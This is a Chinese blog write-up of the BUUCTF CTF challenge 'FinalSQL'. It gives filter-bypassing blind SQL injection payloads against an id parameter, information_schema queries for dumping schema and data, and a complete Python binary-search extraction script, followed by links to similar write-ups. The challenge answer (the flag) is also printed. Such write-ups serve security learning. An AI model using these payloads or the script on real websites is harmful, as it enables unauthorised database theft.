BUUCTF [极客大挑战 2019]FinalSQL

最新推荐文章于 2024-02-23 21:33:47 发布
最新推荐文章于 2024-02-23 21:33:47 发布
阅读量1k 收藏 6
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Chu_Jian_Xiong/article/details/109071522
版权

[极客大挑战 2019]FinalSQL

操作

打开题目,又是这个鬼
在这里插入图片描述
跟着他的流程走,点按钮
在这里插入图片描述

让我们试试别的
在这里插入图片描述

告诉我们对了,但是不是这张表(埋坑)
怀疑这个地址是存在sql注入的,经过fuzz,发现过滤了空格,union之类的关键字,经过一系列的尝试,猜想后台原句

select * fromwhere id=1

通过构造语句,发现正确的页面回显
在这里插入图片描述

''or(ascii(substr(database(),1,1))>32)

接下来就是拿脚本盲注了注入了
以下是注入发现的信息

用户:root@localhost
数据库名:Click
表名:F1naI1y
字段名:id,username,password
	username:mygod,welcome,site,site,site,site,Syc,finally,flag
	password:cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{7c62a615-ec40-44c3-9253-516366f3a908} 

表名:Flaaaaag
字段名:id,fl4gawsl

以下是我总结的payload

爆当前数据库所有表名
(select(GROUP_CONCAT(TABLE_NAME))from(information_schema.tables)where(TABLE_SCHEMA=database()))

爆flag表所有字段名
(select(GROUP_CONCAT(COLUMN_NAME))from(information_schema.COLUMNS)where(TABLE_NAME='flag'))

爆详细信息
(select(GROUP_CONCAT(fl4gawsl))from(Flaaaaag))

脚本

import requests
import time

# url是随时更新的,具体的以做题时候的为准
url = 'http://8d08c7b6-e6f3-4df0-b71c-a2a397891bab.node3.buuoj.cn/search.php?id='
i = 0
flag = ''
while True:
    i += 1
    # 从可打印字符开始
    begin = 32
    end = 126
    tmp = (begin + end) // 2
    while begin < end:
        print(begin, tmp, end)
        time.sleep(0.1)
        # 爆数据库
        # payload = "''or(ascii(substr(database(),%d,1))>%d)" % (i, tmp)
        # 爆表
        # payload = "''or(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(information_schema.tables)where(TABLE_SCHEMA=database())),%d,1))>%d)" % (i, tmp)
        # 爆字段
        # payload = "''or(ascii(substr((select(GROUP_CONCAT(COLUMN_NAME))from(information_schema.COLUMNS)where(TABLE_NAME='F1naI1y')),%d,1))>%d)" % (i, tmp)
        # 爆flag 要跑很久
        # payload = "''or(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, tmp)
        # 爆flag 很快
        payload = "''or(ascii(substr((select(password)from(F1naI1y)where(username='flag')),%d,1))>%d)" % (i, tmp)
        # 错误示例
        # payload = "''or(ascii(substr((select(GROUP_CONCAT(fl4gawsl))from(Flaaaaag)),%d,1))>%d)" % (i, tmp)

        r = requests.get(url+payload)
        if 'Click' in r.text:
            begin = tmp + 1
            tmp = (begin + end) // 2
        else:
            end = tmp
            tmp = (begin + end) // 2

    flag += chr(tmp)
    print(flag)
    if begin == 32:
        break

总结

这题最坑的一点就是,两张表里最让人感觉藏着flag的表里的那个flag字段居然不能查
在这里插入图片描述
而真正的flag却藏在另一张表的password字段的最后一位
在这里插入图片描述

suppose18
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 716
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 392
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
sql注入 [极客挑战 2019]FinalSQL1
最新发布
m0_75178803的博客
02-23 923
逻辑符号|会被检测到,而&感觉成了注释符,&之后的内容都被替换掉了。直接盲注比较慢,还需要利用二分法来编写脚本。这里直接令传入的id=6。传入id=1^1^1。这里利用到大佬的脚本。运行一下得到flag。
[极客挑战 2019]FinalSQL 1
shinygod的博客
04-01 1018
知识点:异或盲注 分析 这边的两个框,试了半天啥东西都没有。 看了大佬的wp,在这注入,而且还时异或盲注。 异或盲注原理 1^1返回0 1^0返回1 所以我们可以通过判断返回的字符来异或盲注。 payload 判断数据库长度,如果(length(database())={0})等于1,说明数据库长度已经出来,则1^1为0,页面回显ERROR #数据库长度 import requests; for i in range(1,20): url = "http://058f339f-0127
[极客挑战 2019]FinalSQL
zzqzzq11的博客
12-03 510
⽤之前的脚本,注意request库的get请求⽤的是param作为参数传递,⽽post⽤的是data。使⽤geek数据库获取表名,修改代码为:sql =使⽤F1nal1y表获取列名:sql =
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
BUUCTF [极客挑战 2019]EasySQL
m0_49025459的博客
04-06 268
题目 这题啊很快奥,我就想用个永真表达式测试一次,结果一下子就出来了 admin' or '1'='1 登录
盲注脚本爆数据库之[极客挑战 2019]FinalSQL
qq_58970968的博客
08-11 447
当过滤的东西很多很多的时候,可以考虑盲注,用 ^ 来判断是否可以进行脚本注入;使用二分法查找数据库的每一个字母;到时候只需要改回显的关键字和url就行。
[极客挑战 2019]FinalSQL1 wp
m0_55185160的博客
08-06 229
我们打开网页,用admin和'1去试 结果给我们返回的报错为 于是我再次输入admin ,passward进行登录结果报错还是一样, 之后把admin改* 结果报错信息还是一,样, 又因为本题为fianlSQL,可能存在盲注。 于是借助了大佬的脚本, import requests url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php' flag = '' for i in range(1,250)
BUUCTF 个人做题记录【7-03】
qq_61620566的博客
07-03 1450
学习才会进步
buuctf [极客挑战 2019]Http1
weixin_63289925的博客
04-07 4919
啥也没有,查看网页源代码 看到了一个不一样的东西,url+/Secret.php进行访问 图是我们不是从https://Sycsecret.buuoj.cn这个地方来的,我们就欺骗它从这个地方去试试 需要使用到HTTP Referer伪造 Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器籍此可以获得一些信息用于处理。” 方法一:使用bp抓包,在最后一行加上Referer:https://...
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 420
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值